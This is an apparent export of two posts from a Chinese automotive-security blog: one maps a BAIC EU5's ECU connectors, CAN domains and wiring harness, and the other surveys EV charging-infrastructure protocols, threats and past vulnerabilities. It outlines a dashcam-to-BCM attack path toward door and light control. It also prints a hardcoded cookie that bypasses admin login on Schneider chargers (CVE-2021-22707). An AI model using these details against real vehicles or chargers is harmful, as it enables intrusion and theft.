档控制器</h5><p>电动汽车上的P挡控制,其作用等同于传统自动变速器的“驻车挡”。</p><p><img src="image-20211112114605397.png" alt="image-20211112114605397"></p><h5 id="ESK-档位控制器"><a href="#ESK-档位控制器" class="headerlink" title="ESK 档位控制器"></a>ESK 档位控制器</h5><p>旋转式电子档位控制器用于切换 D档、R档、N档、S档、L档等。</p><p><img src="image-20211112111732143.png" alt="image-20211112111732143" style="zoom:50%;" /></p><h5 id="VBP-真空泵控制器"><a href="#VBP-真空泵控制器" class="headerlink" title="VBP 真空泵控制器"></a>VBP 真空泵控制器</h5><p>真空泵用于产生真空,利用产生的负压增加制动力。</p><p><img src="image-20211112112301791.png" alt="image-20211112112301791" style="zoom:67%;" /></p><h4 id="IBUS-信息域-智能座舱域"><a href="#IBUS-信息域-智能座舱域" class="headerlink" title="IBUS 信息域/智能座舱域"></a>IBUS 信息域/智能座舱域</h4><p>智能网联汽车之所以叫做智能网联,智能座舱在其中扮演着至关重要的角色。智能座舱中包括中控娱乐系统、组合仪表、空调舒适系统、低速行人警示器等。</p><h5 id="中控娱乐系统"><a href="#中控娱乐系统" class="headerlink" title="中控娱乐系统"></a>中控娱乐系统</h5><p>中控面板可能是传统按钮式的,也可能是更加现代的电子式。通过中控面板上的按钮控制空调,有中控通过IBUS传达给空调控制器。</p><p><img src="image-20211112122759622.png" alt="image-20211112122759622"></p><h5 id="音响主机C"><a href="#音响主机C" class="headerlink" title="音响主机C"></a>音响主机C</h5><p>音响主机也被叫做车机、IVI、中控主机等,连接有控制按钮、扬声器、麦克风、摄像头等。</p><p><img src="image-20211112123726218.png" alt="image-20211112123726218"></p><h5 id="组合仪表"><a href="#组合仪表" class="headerlink" title="组合仪表"></a>组合仪表</h5><p>组合仪表通过IBUS接收汽车行驶和其他的转态数据并展现在仪表上。组合仪表与车机都在智能座舱域下,没有经过网关,是可以直接互通的。</p><p><img src="image-20211112124106173.png" alt="image-20211112124106173"></p><h5 id="ACP-空调控制器"><a href="#ACP-空调控制器" class="headerlink" title="ACP 空调控制器"></a>ACP 空调控制器</h5><p>空调控制器接收 IBUS 上的空调控制信息,驱动空调制热或制冷。同时有各种传感器进行监控。</p><p><img src="image-20211112120425461.png" alt="image-20211112120425461"></p><h5 id="EAS-电动压缩机控制器"><a href="#EAS-电动压缩机控制器" class="headerlink" title="EAS 电动压缩机控制器"></a>EAS 电动压缩机控制器</h5><p>空调控制器通过 CAN 控制 EAS 空调压缩机驱动器制热或制冷。</p><p><img src="image-20211112121243656.png" alt="image-20211112121243656"></p><h5 id="PTC-电加热控制"><a href="#PTC-电加热控制" class="headerlink" title="PTC 电加热控制"></a>PTC 电加热控制</h5><p>通过 CAN 控制 PTC 加热控制器调节温度。</p><p><img src="image-20211112121443053.png" alt="image-20211112121443053"></p><h5 id="低速行人警示器"><a href="#低速行人警示器" class="headerlink" title="低速行人警示器"></a>低速行人警示器</h5><p>由于纯电动汽车在低速行驶时噪音相对较小,周边行人很难察觉。为了提高行车安全性,该系统可以在车速低于30公里时发出警示声音,借此可以使得周边行人更好地察觉。</p><p><img src="image-20211112122140688.png" alt="image-20211112122140688"></p><h4 id="EBUS-车身域"><a href="#EBUS-车身域" class="headerlink" title="EBUS 车身域"></a>EBUS 车身域</h4><p>车身域主要包括车身附件控制(门窗控制、门锁等)、内外饰附件控制(天窗、雨刮、内外灯等)、启动控制、数字钥匙等。车身域中的主要模块有 BCM 车身控制模块、PEPS 一键启动开关、无钥匙进入、TPMS 胎压检测、PAS 泊车辅助雷达、AVM 全景摄像模块、SDM 安全气囊控制器、ESCL转向柱锁、DVR行车记录仪等。</p><p>车身域控制系统特点:</p><ul><li>涉及多领域,个性化设置,如作为座椅位置记忆;语音控制,控制车窗等;</li><li>涉及系统多,与整车绝大多数其他系统存在信息交互:动力系统、娱乐系统等;</li><li>涉及功能安全,近灯光控制(ASILB)、前雨刷控制(ASILB)、整车电源状态管理(ASILB)、车窗防夹(ASILA)。</li><li>涉及高感知功能,重要程度高,影响车辆启动、用户进入;车窗、灯光控制等使用频率高。</li></ul><p>车身域控制系统涉及多个技术领域,接口类型多,资源需求不同车型变化大;同时又涉及功能安全以及高感知的功能,有较高的可靠性设计要求;另外还涉及PEPS、TPMS、蓝牙、NFC 等无线通讯技术。</p><h5 id="BCM-车身控制模块"><a href="#BCM-车身控制模块" class="headerlink" title="BCM 车身控制模块"></a>BCM 车身控制模块</h5><p>BCM((Body Control Module)车身控制模块的功能包括:电动门窗控制、中控门锁控制、遥控防盗、灯光系统控制、电动后视镜)加热控制、仪表背光调节、电源分配等。</p><p><img src="image-20211112000231431.png" alt="image-20211112000231431"></p><p><img src="image-20211112000835375.png" alt="image-20211112000835375"></p><h5 id="PEPS-无钥匙进入与一键启动"><a href="#PEPS-无钥匙进入与一键启动" class="headerlink" title="PEPS 无钥匙进入与一键启动"></a>PEPS 无钥匙进入与一键启动</h5><p>PEPS(Passive Entry Passive Start)无钥匙进入及启动系统, 由控制器、智能钥匙中的射频(RF)发射器和汽车端的接收器等组成。当钥匙在有效范围内,车主拉动车门或按下一键启动开关, 相应的模块会发送中断信号来唤醒主控制器,开始整个通信过程。整个过程无需使用钥匙,即可打开车门或者启动发动机。主要零部件有遥控钥匙、天线、车身控制模块(BCM)、涉及核心技术有RFID识别技术、加密算法、 EMC技术。</p><p>根据无钥匙进入的插线端子可知有两组天线,用户探测钥匙是否在周边。当钥匙在可识别距离内,将车门设置为可打开模式。</p><p><img src="image-20211111233345398.png" alt="image-20211111233345398"></p><p>SSB(SSB Start Stop Button,一键启动按键) 俗称点火按开关,用于启动发动机。</p><p><img src="image-20211111232400288.png" alt="image-20211111232400288"></p><p>现在也出现了 PEPS 与 BCM 融合的方案。</p><p><img src="image-20211113234220158.png" alt="image-20211113234220158"></p><h5 id="TPMS-胎压检测"><a href="#TPMS-胎压检测" class="headerlink" title="TPMS 胎压检测"></a>TPMS 胎压检测</h5><p>TPMS(Tire Pressure Monitoring System,胎压智能监测系统)是一种采用无线传输技术,工作频率在 433.92 MHz,利用固定于汽车轮胎内的高灵敏度微型无线传感装置在行车或静止的状态下采集汽车轮胎压力、温度等数据,并将数据传送到驾驶室内的显示屏中,以数字化的形式实时显示汽车轮胎压力和温度等相关数据,并在轮胎出现异常时(预防爆胎)以蜂鸣和语音等形式提醒驾驶者进行预警的汽车主动安全系统。确保轮胎的压力和温度维持在标准范围内,起到减少爆胎、毁胎的概率,降低油耗和车辆部件的损坏的作用。中央监视器接收 TPMS 监测模块发射的信号,将各个轮胎的压力和温度数据显示在屏幕上,供驾驶者参考。如果轮胎的压力或温度出现异常,中央监视器根据异常情况,发出报警信号,提醒驾驶者采取必要的措施。 </p><p>TPMS 检测到胎压数据经过 EBUS CAN 传输给其他 ECU 使用。</p><p><img src="image-20211111233735818.png" alt="image-20211111233735818"></p><h5 id="PAS-泊车辅助雷达"><a href="#PAS-泊车辅助雷达" class="headerlink" title="PAS 泊车辅助雷达"></a>PAS 泊车辅助雷达</h5><p>PAS(<em>Parking</em> Assist System,泊车辅助系统)利用倒车雷达和为驾驶员在狭窄空间停放车辆时提供援助,通过发送声音信号以及在中央显示屏上显示相应图形指示与障碍物的距离。</p><p><img src="image-20211111234419237.png" alt="image-20211111234419237"></p><h5 id="AVM-全景摄像模块"><a href="#AVM-全景摄像模块" class="headerlink" title="AVM 全景摄像模块"></a>AVM 全景摄像模块</h5><p>AVM(Around View Monitor,全景影像的系统)通过多个超大广角鱼眼镜头拍摄图像,然后经过数据处理对拍摄图像进行畸变矫正以及拼接,形成周围影像。为驾驶员提供车身四周的俯视图像,消除驾驶员的视野盲区,泊车时可提供有效的视觉辅助功能。最主要的接口是变道灯、摄像头视频和供电接口。</p><p><img src="image-20211111230713168.png" alt="image-20211111230713168"></p><h5 id="SDM-安全气囊控制器"><a href="#SDM-安全气囊控制器" class="headerlink" title="SDM 安全气囊控制器"></a>SDM 安全气囊控制器</h5><p>SDM 安全气囊控制器管控安全气囊和安全带。</p><p><img src="image-20211111234950790.png" alt="image-20211111234950790"></p><h5 id="ESCL-转向柱锁"><a href="#ESCL-转向柱锁" class="headerlink" title="ESCL 转向柱锁"></a>ESCL 转向柱锁</h5><p>ESCL(Electronic Steering Column Lock,电子转向柱锁)是车辆防盗系统的一部分,用于无钥匙进入无钥匙启动系统中锁止和解锁方向盘。ESCL 的上锁和解锁动作通过控制 ESCL 内的电机动作来实现。ESCL产品的安全等级需要根据整车系统构架和ISO26262进行评估与计算。此外还需满足不同国家和地区的法规要求(如GB15740、 ECER116等 )。</p><p><img src="image-20211111232117359.png" alt="image-20211111232117359"></p><h5 id="DVR-行车记录仪"><a href="#DVR-行车记录仪" class="headerlink" title="DVR 行车记录仪"></a>DVR 行车记录仪</h5><p>DVR 行车记录仪也有接入到 EBUS CAN 网络中。</p><p><img src="image-20211111235251029.png" alt="image-20211111235251029"></p><h4 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h4><h5 id="后排标准USB接口"><a href="#后排标准USB接口" class="headerlink" title="后排标准USB接口"></a>后排标准USB接口</h5><p>后排的标准USB接口只有电源针脚,没有数据针脚。而前排的 USB 接口大多是全功能的 USB 接口,既可以充电也可以传输数据。</p><p><img src="image-20211112131248725.png" alt="image-20211112131248725"></p><h5 id="点烟器"><a href="#点烟器" class="headerlink" title="点烟器"></a>点烟器</h5><p>一直很好奇点烟器是不有其他特殊的功能,看到只有电源针脚,原来是我想多了。</p><p><img src="image-20211112131454826.png" alt="image-20211112131454826"></p><h5 id="PEU-电机控制器"><a href="#PEU-电机控制器" class="headerlink" title="PEU 电机控制器"></a>PEU 电机控制器</h5><p>新能源汽车最核心的技术“三电”,即电机、电控、电池。电机控制器是用来控制电动车电机的启动、运行、进退、速度、停止以及其它电子器件的核心控制器件。PEU 电机控制器同时接入到了 EVBUS 能量域和 CBUS 底盘域中。</p><h3 id="网络拓扑"><a href="#网络拓扑" class="headerlink" title="网络拓扑"></a>网络拓扑</h3><p>根据各 ECU 插线端子上的通信接口将同一个网络域上的 ECU 串联,然后并不同网络进行并联。上文中在解读各 ECU 端子中已进行分类,现只需要将上述的内容绘制成图即可,画完之后的图如下。</p><p><img src="网络拓扑-北汽EU5 网络结构.png" alt="网络拓扑-北汽EU5 网络结构"></p><p>整个网络以网关为核心,一共有8个子网络,分别是远程监控网络、诊断网络、能量域、快速充电网络、底盘域、信息域、车身域以及LIN总线网络。</p><h3 id="整车线束"><a href="#整车线束" class="headerlink" title="整车线束"></a>整车线束</h3><p>从接线端子梳理完这个网络结构后,返回到汽车本身,汽车网络是由线束连接的,各插线端子最终都会连接到线束上,所以我们有必要去了解整车线束。</p><p>汽车线束是汽车电路的网络主体,没有线束也就不存在汽车电路。线束是指由铜材冲制而成的接触件端子(连接器)与电线电缆压接后,外面再塑压绝缘体或外加金属壳体等,以线束捆扎形成连接电路的组件。</p><ul><li><strong>前舱线束:</strong>布置在汽车前舱区域,用于连接车身控制系统。前舱线束与仪表线束、PEU线束、前端线束、前保险杠线束、车身线束相连。ABS系统、BMS、PEU、灯具,前雨刮洗涤系统,电源系统、中央电器盒、油门加速踏板等位于前舱区域。</li><li><strong>仪表线束:</strong>布置在汽车仪表区域,用于连接驾驶系统、娱乐系统、空调系统等电器。仪表线束与前舱线束、车身线束、顶棚线束、空调线束相连。组合仪表、音箱主机、中控面板、中控显示屏、扬声器、OBD 诊断接口、ESP、ESCL 转向柱锁、灯光组合开关、电动后视镜、网关、点烟器、P 档控制器、ESK 旋转式电子换挡、一键启动开关、驾驶员/副驾驶安全气囊、TPMS、BCM、吹脚风道、除霜风道、行李箱与C2L开关等连接在仪表线束上。</li><li><strong>车身线束:</strong> 布置在汽车车身,是汽车线束中的骨干,与前舱线束、仪表线束、前保险线束、后保险线束、座椅线束相连。TBOX、EPB、执行人警示开关、GPS、CMU 交流插座控制单元、后备箱天线、行李箱锁电机、行李箱灯、倒车雷达模块、左右侧安全气囊、左右后组合灯、左右侧气帘、高位制动灯、后排USB接口、后摄像头、AVM 全景摄像模块等连接在车身线束上。</li><li><strong>前端线束:</strong>布置在汽车前端,与前舱线束相连。喇叭、左右侧碰撞传感器、DC-CHM、机舱盖锁、行人警示器连接在前端线束上。</li><li><strong>PEU(动力电子单元)线束:</strong>PEU线束与前舱线束相连,P档电机、电机水泵控制器、正空泵电源、真空泵控制器、蓄电池正极起动机等连接在PEU线束上。</li><li><p><strong>前保险杠线束:</strong>前保险线束与前舱线束相连,快充盖锁、前摄像头、左右日间行车灯等连接在前保险杠线束上。</p></li><li><p><strong>后保险杠线束:</strong>后保险杠线束与车身线束相连,中/后雷达、后雾灯等连接在后保险杠线束上。</p></li><li><p><strong>车门线束:</strong> 每一扇门拥有一根车门线束。车门线束与车身线束相连,扬声器、后视镜、玻璃升降开关、玻璃升级电机、门锁总成、门把手开关等连接在车门线束上。</p></li><li><p><strong>顶棚线束:</strong>顶棚线束与仪表线束相连,行车记录仪、顶灯、ADAS 前摄像头、天窗、雨量传感器等连接在顶棚线束上。</p></li><li><strong>空调线束:</strong>空调使用的线束,通过连接仪表线束接入整车线束中。蒸发温度传感器、内外循环电机、模式电机、混合风机等连接在空调线束上。</li><li><strong>座椅线束:</strong>布置在座椅区域,用于调节座椅高度、加热等。通过连接车身线束接入整车线束中。座椅加热控制器、座椅加热丝、座椅高度调节电机、座椅前后调节电机、座椅靠背调节电机等连接在座椅线束上。</li></ul><p>整车线束的参考位置如下。</p><p><img src="image-20211111150913360.png" alt="image-20211111150913360"></p><h3 id="插线端子在车联网安全上的思考"><a href="#插线端子在车联网安全上的思考" class="headerlink" title="插线端子在车联网安全上的思考"></a>插线端子在车联网安全上的思考</h3><p>在黑盒的情况下,对零部件的物理分析往往是插线端子开始的,这第一步就是找到电源针脚,找到供电针脚上电后才开始了正式的研究工作。梳理出各个 ECU 常见的插线端子,有助于简化分析流程,将精力投入到更为深入的漏洞挖掘工作之中。</p><p>此外,在插线端子上也可以找到一些脆弱的攻击点。例如,DVR 行车记录仪,从插线端子来看 DVR 接入到了车身域 CAN 网络中。那么就可以从行车记录仪入手,拿下 DVR 控制权后,进入到车身域中,而 BCM 也正好处于同一网络之中,BCM 又控制着车门、车灯。这一条控车的逻辑链路,当下没有被大家广泛关注,重点人在云端、TBOX 或 IVI上。从行车记录仪控车的这条路,星舆实验室正在积极探索之中,我们通过无接触的方式利用未知漏洞已经拿到某车行车记录仪的系统权限。 </p><p>在研究插线端子中,我们还有其他的一些想法。欢迎大家和我们一起研究、探讨车联网安全,共同守护出行安全。 </p><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><a href="https://delikely.github.io/2021/08/15/TBOX-Main-Function/">车联网安全基础知识之TBOX主要功能</a></li><li><a href="https://mp.weixin.qq.com/s/d-GcMiI51ugrnvSfQScL-A">北汽EV200/比亚迪唐/比亚迪e6 车载网络结构剖析</a></li><li><a href="https://zhuanlan.zhihu.com/p/149932069">BMS电池管理系统由浅入深全方位解析</a></li><li><a href="https://mp.weixin.qq.com/s/6bZ2KGoMF307etKGGMnGjA">上汽乘用车:车身域控制系统开发实践</a></li><li><a href="https://www.doc88.com/p-17347380206512.html">无钥匙系统PEPSBCM一体式技术方案</a></li><li><a href="https://zhuanlan.zhihu.com/p/57872365">无钥匙进入及启动系统(Kessy)简介</a></li><li><a href="https://www.auto-made.com/news/show-10990.html">汽车线束详细分类</a></li><li>北汽新能源 EU5 维修手册电路图(来自互联网)</li></ul>]]></content>
<summary type="html"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>在不久之后实验室计划拆车,研究车辆的组成结构。拆车是很容易的,但拆完之后能原封不动的装回去且能正常运行还是需要功夫的。正好拿到了一辆车完整的</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之充电基础设施</title>
<link href="http://delikely.github.io/2021/10/20/Charging-infrastructure/"/>
<id>http://delikely.github.io/2021/10/20/Charging-infrastructure/</id>
<published>2021-10-20T10:14:51.000Z</published>
<updated>2021-11-14T16:33:58.043Z</updated>
<content type="html"><![CDATA[<p>7 月 30 日国务院正式公布《关键信息基础设施安全保护条例》,可见国家对关键信息基础设施安全的重视程度之高。其中电动汽车充电设施是关键信息基础设施中重要的组成部分,同时在《汽车数据安全管理若干规定》第三条中也将<code>汽车充电网的运行数据</code>划归为了重要数据。今天我们就来谈一下充电基础设施的安全。</p><p>充电基础设施也有一个庞大供应服务系统,主要包括设备制造商、设施运营商、互联网平台提供商。本文将按照充电基础设施的组成结构分析充电基础设施的安全,内容涉及基础知识、安全威胁、历史漏洞等。</p><p><img src="充电基础设施供应商.png" alt="充电基础设施供应商"></p><h3 id="充电设施信息交换基础架构"><a href="#充电设施信息交换基础架构" class="headerlink" title="充电设施信息交换基础架构"></a>充电设施信息交换基础架构</h3><p>电动汽车充电设施信息交换基础架构如下图,从下到上分为四层,分别是信息接入层、基础设施层、运营服务层以及数据共享层。</p><p><strong>信息接入层(EVAC)</strong> 指的是与充电基础设施(充电桩)通信的外部接入层,其中包括电动汽车、二维码、NFC、智能终端等。</p><p><strong>基础设施层(EVIE)</strong> 主要指代充电桩。按充电类型分类,分为交流充电桩(又称慢充)和直流充电桩(又称快充)、按安装条件分类,分为立式充电桩和壁挂充电桩。基础设施层是电动汽车充电的执行主体,从信息接入层接受来自外部的充电请求经过基础设施层处理后,执行充电或其他任务。</p><p><strong>运营服务层(EVSOP)</strong> 是充电服务云端的直接业务层,包括充电运营服务平台和结算平台。</p><p><strong>数据共享层(EVDSS)</strong> 包括第三方服务及管理平台,为运营服务层提供数据服务与管理支持。</p><p><img src="image-20210928160341232-16340382000954.png" alt="image-20210928160341232-16340382000954"></p><h3 id="充电桩-机"><a href="#充电桩-机" class="headerlink" title="充电桩(机)"></a>充电桩(机)</h3><p>充电桩(机)是充电基础设施的最前端,直接与电动汽车、用户进行交互,位于<code>充电设施信息交换基础架构</code>中的<code>基础设施层</code>中。充电桩可以按照充电方式、安装方式、安装地点进行分类,具体分类如下表。</p><p><img src="image-20210904143228044.png" alt="image-20210904143228044"></p><p>直流充电桩是当前使用最广泛的充电桩,基本构成包括:功率单元、控制计费单元、计量单元、充电接口、供电接口及人机交互界面等。</p><p><img src="网络拓扑-充电桩.png" alt="网络拓扑-充电桩" style="zoom:39%;" /></p><p>充电桩将电网中的电力通过动力电源输入,经过功率变换单元转化为与电动汽车匹配的功率,由输出开关单元控制充电过程,使用充电电缆车辆插头传送电能给电动汽车。在整个充电过程中,主要的控制和数据交互部分是充电控制单元承担的。</p><h4 id="TCU-介绍"><a href="#TCU-介绍" class="headerlink" title="TCU 介绍"></a>TCU 介绍</h4><p>充电控制计费单元简称 TCU。TCU 集成串口、CAN总线、485总线、SD总线、以太网、SIM卡槽、音频、LVDS、数字量输入输出等接口,并支持北斗、GPS双模定位、蓝牙通信、4G全网通通信等功能,可实现充电桩人机显示、计费计量、支付、数据加密、控制充电设备、与车联网平台通信等业务相关的管理功能。</p><p><em>注:本文中提到的 TCU 指满足《非车载整车直流充电机通用技术规范》要求的控制计费单元,与其他类型的控制计费单元存在一些差异。这部分留到以后再来分享。</em></p><p>充电机内部最重要的控制模块由两部分组成,分别是业务部分、电气部分。业务部分与电气部分通过 CAN 总线相连, 充电计费控制单元和充电控制器之间传输充电状态信息及故障信息等, 同时充电机控制器根据计费控制单元控制整个充电过程。</p><p><strong>业务部分:</strong>充电控制计费单元通过蜂窝网络、网线等方式接入充电运营平台,接收并执行充电运行平台发送的指令、上传本地充电数据等; 计费控制单元与显示器与输入模块通过LVDS/并口连接,是人机交互的主要部分;CPU读卡器通过 RS232 与计费控制单元连接,用于使用储值卡充电的场景;多功能电表与计费控制单元通过 RS485 相连,用于计量消耗的电量值;此外计费控制单元还与 GNSS 天线、RS232 调试接口等其他外部输入模块进行数据交互。</p><p><strong>电气部分:</strong>通过充电设备控制器实现电气保护、与车辆交互、交直流变化、环境控制等。</p><p><img src="news160323_1.png" alt="充电机内部元器件关系图" style="zoom:70%;" /></p><h4 id="TCU-硬件"><a href="#TCU-硬件" class="headerlink" title="TCU 硬件"></a>TCU 硬件</h4><p>充电计费控制单元的 SOC多采用 ARM 架构,多采用嵌入式 Linux 系统,外部接口丰富,采用模块化设计,满足《非车载整车直流充电机通用技术规范》的要求,规范中定义了需要与外部交互的接口与功能。某 TCU 核心板如下图所示。</p><p><img src="640.webp" alt="img"></p><p>TCU 外壳上一般会详细标注接口的用途,具体用途见上文<code>TCU 介绍</code>中的 <code>业务部分</code>,这里不再赘述。</p><p><img src="tcu.png" alt="img" style="zoom: 80%;" /></p><h3 id="智能充-换电柜"><a href="#智能充-换电柜" class="headerlink" title="智能充/换电柜"></a>智能充/换电柜</h3><p>电动自行车共享充/换电柜解决了广大外卖配送人员的续航焦虑,也方便了广大的电动单车用户。当前充/换电柜暂时没有统一的规范——各自为政,存在诸多的安全问题。前不久,我们曾研究过一款充电柜,可以打开任意柜门。</p><p><img src="qiegewala.png" alt="qiegewala" style="zoom:25%;" /></p><h3 id="换电站"><a href="#换电站" class="headerlink" title="换电站"></a>换电站</h3><p>国庆期间冲上热搜的 <strong>充电1小时排队4小时</strong>,电动汽车充电是一个老大难的问题。蔚来率先开启了换电模式,换电站的安全也不容易忽视。 </p><h3 id="通信协议"><a href="#通信协议" class="headerlink" title="通信协议"></a>通信协议</h3><p>了解了充电基础设施的硬件部分,现在来看看充电网络中专有的通信协议。这里只做简单介绍,不会详细展开分析,后续会在实际的案例中再讲解。</p><p>电动汽车与充电桩、充电桩内部、充电桩与运营平台、运营平台与第三方服务及管理平台之间使用了一系列专有协议,各层级使用的协议如下图所示。</p><p><img src="网络拓扑-充电基础设施协议.png" alt="网络拓扑-充电基础设施协议" style="zoom:50%;" /></p><h4 id="电动汽车充电机与电池管理系统"><a href="#电动汽车充电机与电池管理系统" class="headerlink" title="电动汽车充电机与电池管理系统"></a>电动汽车充电机与电池管理系统</h4><p><strong>BMS 协议</strong>:BMS(BMS,Battery Management System) 协议用于电动汽车充电机与电池管理系统之间。BMS 协议基于 CAN 协议,通信数据为250kbit/s。 使用 29 位标识符的 CAN 拓展帧,通信地址固定,任何手段都不能改变,充电机地址为 86(56H)、BMS 地址为 244(F4)。</p><h4 id="计费控制单元与充电控制器通信协议"><a href="#计费控制单元与充电控制器通信协议" class="headerlink" title="计费控制单元与充电控制器通信协议"></a>计费控制单元与充电控制器通信协议</h4><p>协议规定了计费控制单元与充电控制器之间采用 CAN 总线通信。在充电过程中, 充电计费控制单元和充电控制器交互充电状态信息及故障信息等, 同时充电机控制器根据计费控制单元控制整个充电过程。此协议与 BMS 协议相似,同样基于 CAN 协议,通信数据为250kbit/s。 使用 29 位标识符的 CAN 拓展帧,通信地址固定,任何手段都不能改变,计费控制单元地址为 138(8AH)、充电控制器地址为 242(F6H)。</p><h4 id="电量计量协议"><a href="#电量计量协议" class="headerlink" title="电量计量协议"></a>电量计量协议</h4><p>计费控制单元与电表的之间的通信采用 DL/T 645、Modbus 等协议,并使用 RS485 传输消息。主要功能是统计电动汽车充电的电量值,用于费用结算。</p><h4 id="充电机与运营平台协议"><a href="#充电机与运营平台协议" class="headerlink" title="充电机与运营平台协议"></a>充电机与运营平台协议</h4><p>充电机与运营平台协议适用于归属不同运营商的电动汽车充换电运营服务平台之间的充换电服务信息交换,以及电动汽车充换电运营服务平台与第三方服务及管理平台之间的信息交换。协议承载的主要服务包括用户认证、资产管理、设备认证、充电控制、计费模式管理等。</p><p><img src="image-20210905213636053.png" alt="image-20210905213636053"></p><p>充电机与运营平台之间的通信协议较多,主流的有OCPP、T/CEC 102.4、CCTIA-充电桩与运营平台通讯协议等。</p><p><strong>OCPP: </strong>OCPP 是一个全球开放性的通讯标准,主要用于解决私营的充电网络间通讯产生的各种困难。OCPP支持充电站点与各供应商中央管理系统间的无缝通讯管理。OCPP 在全球多个国家得到使用。OCPP协议主要负责充电运营服务商对充电桩的日常充电运营与维护管理,支持基本充电功能、固件更新、预约充电、充电站管理本地授权列表等功能。OCPP支持多种实施架构下的智能有序充电,是国际电动汽车与电网协同项目中常见的协议。</p><p><strong>T/CEC 102.4 第6部分:</strong> 中电联推出的电动汽车充换电设备接入充换电设备运营服务平台的技术规范。定义了充换电设备与服务平台后之间的信息交互的类型和相应的信息交互流程。应用规约数据单元(APDU)为一个传输单元,协议采用二进制格式。数据域可选用的加密方式有TLS、AES、SM7、SM4、SM1。</p><p><strong>CCTIA-充电桩与运营平台通讯协议: </strong> 此协议是中国电动汽车充电技术与产业联盟充电标准于2016年推出的。标准由中国普天和珠海小可乐、中移物联、泰尔实验室、积成电子等参与编写。协议采用二进制格式,通讯方式为 SOCKET 长链接方式,并使用SM4 对称加密算法加密。协议数据单元的起始为固定值 0x0601,末尾为固定值 0x0F02。</p><h4 id="运营服务平台信息交互"><a href="#运营服务平台信息交互" class="headerlink" title="运营服务平台信息交互"></a>运营服务平台信息交互</h4><p>《 T/CEC 102.4 电动汽车充电漫游服务信息交互》内容涉及认证识别、充电信息共享、业务数据交换、安全数据加密及传输机制、以及其他服务,目标是让电动汽车用户在不同充电服务网络之间自由切换。其中主要定义了不同运营商服务平台之间的充换电服务信息交换,以及电动汽车充换电服务平台与第三方服务及管理平台之间的信息交换。不同运营服务平台交互的服务有平台认证、用户认证、设备认证、业务策略、充电策略、充电业务、充电订单、订单对账等。</p><p><img src="clip_image002.png" alt="img"></p><p>所有数据传输接口均采用 HTTP(S) 接口,每个接口的 URL 均采用格式定义:<code>http(s)://[域名]/evcs/v[版本号]/[接口名称]</code>。所有接口均使用 HTTP(S)/POST 方式传输参数,采用 JSON 的方式,传输过程中应包含消息头和消息主体两部分。消息主体由运营商标识(OperatorID)、参数内容(Data)、时间戳(TimeStamp)、自增序列(Seq)和数字签名(Sig)组成。</p><p> T/CEC 102.4 主要起草单位为普天新能源、特来电、国家电网等。此规范在国家电网公司、普天新能源有限公司等主流电动汽车充电服务运营商得到广泛应用。中国向国际电工委员会提出国际标准提案并得到批准,现已成为了国际标准。</p><h3 id="安全威胁"><a href="#安全威胁" class="headerlink" title="安全威胁"></a>安全威胁</h3><p>笔者曾多次为大型充电运营商挖掘充电桩漏洞,发现当前充电桩的防护能力较弱,存在较多的安全隐患。充电桩的国家安全标准正在制定中,但团标 《T/CEC 208—2019 电动汽车充电设施信息安全技术规范》已发布 2 年,笔者也有幸参与过此标准的制定过程。</p><p>充电基础设施面临的主要的安全威胁可分为三类充电桩安全、通信安全、云平台安全。</p><h4 id="充电桩安全"><a href="#充电桩安全" class="headerlink" title="充电桩安全"></a>充电桩安全</h4><p>充电基础设施中遭受攻击首当其冲就是充电桩,充电桩厂商鱼龙混杂,安全能力参差不齐。充电桩数量庞大,且与用户直接接触,攻击面较多。</p><ol><li><p>HMI 界面弱口令</p><p>从 HMI 界面可以进入充电桩的系统配置页面,在里面能够配置各类参数,如设置网络、修改平台地址、调试等。 弱口令是老生常谈,但也屡见不鲜。</p></li><li><p>系统/应用安全</p><p>充电桩多采用嵌入式 Linux 系统,系统使用的各类组件可能存在已知漏洞,各类服务配置可能存在缺陷。</p></li><li><p>硬件安全</p><ul><li><p>调试接口(串口、网口),未做防护</p></li><li><p>固件易被提取分析</p></li></ul></li></ol><h4 id="通信安全"><a href="#通信安全" class="headerlink" title="通信安全"></a>通信安全</h4><p>除了上文提到的 BMS、COPP、T/CEC 102.4 等通信协议安全外,还有板载协议的安全,如读卡器使用的 RS232 等。大部分的通信都对数据加密进行了定义,不安全的使用加密手段也可能带来安全威胁。此外基于通信消息上可能还有业务逻辑上的缺陷,如通过伪造 VIN 码实现免费充换电等。</p><h4 id="云平台安全"><a href="#云平台安全" class="headerlink" title="云平台安全"></a>云平台安全</h4><p>ECMP(电动汽车充电监控运营管理平台,EV CHARGING MANAGEMENT PLATFORM) 面临的安全风险与传统业务的云服务平台差异不大,主要面临的威胁有 WEB 组件漏洞、主机漏洞、服务配置不当、逻辑漏洞等。</p><p>云平台被攻陷会造成大量的数据泄露,涉及大量的个人隐私泄露,如姓名(昵称)、余额、充电历史记录(时间、地点)等。</p><h3 id="历史漏洞"><a href="#历史漏洞" class="headerlink" title="历史漏洞"></a>历史漏洞</h3><p>从 <a href="http://timeline.icvsec.com/">汽车信息安全事件时间轴</a> 了解到,充电桩曾多被攻陷。以下是其中三个比较典型的漏洞。</p><ul><li><p><strong>施耐德充电桩被攻陷</strong></p><p>今年安全研究员 <strong>BaCde</strong> 与 <strong>Kevin2600(星舆实验室成员 高级安全研究员)</strong> 针对施耐德充电桩展开漏洞挖掘,最终实现了在无用户交互场景下的远程 Root shell 的获取。研究成果已在今年 <a href="https://youtu.be/PW60NXN0qZE">DEFCON</a> 黑客大会上公开 。其中两个高危漏洞为:</p><p><strong>CVE-2021-22707</strong>:Web 后台存在硬编码,在cookie中添加 CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a;SESSIONID=admin 可以绕过登录认证,获取 Web 后服务的管理员权限。</p><p><strong>CVE-2021-22708</strong>:固件验签算法存在缺陷,攻击者精心构造的恶意升级包能够绕过校验验证。通过刷入恶意固件,能够获取充电桩的 Root Shell。</p></li><li><p><strong>网约车司机使用“捏枪法”、“卡秒法”半年窃电 382 次获刑</strong></p><p>北京网约车司机董某利用国家电网充电软件的漏洞,使用“捏枪法”、“卡秒法”实现免费或低价充电,半年的时间偷电 382 次。北京市大兴区人民检察院以盗窃罪、传授犯罪方法罪对其提起公诉,董某被法院判处有期徒刑1年,并处罚金 1000 元。</p><p>“捏枪法”:利用 e充电 APP 扫描充电桩上的二维码,之后支付 0.5 或 1 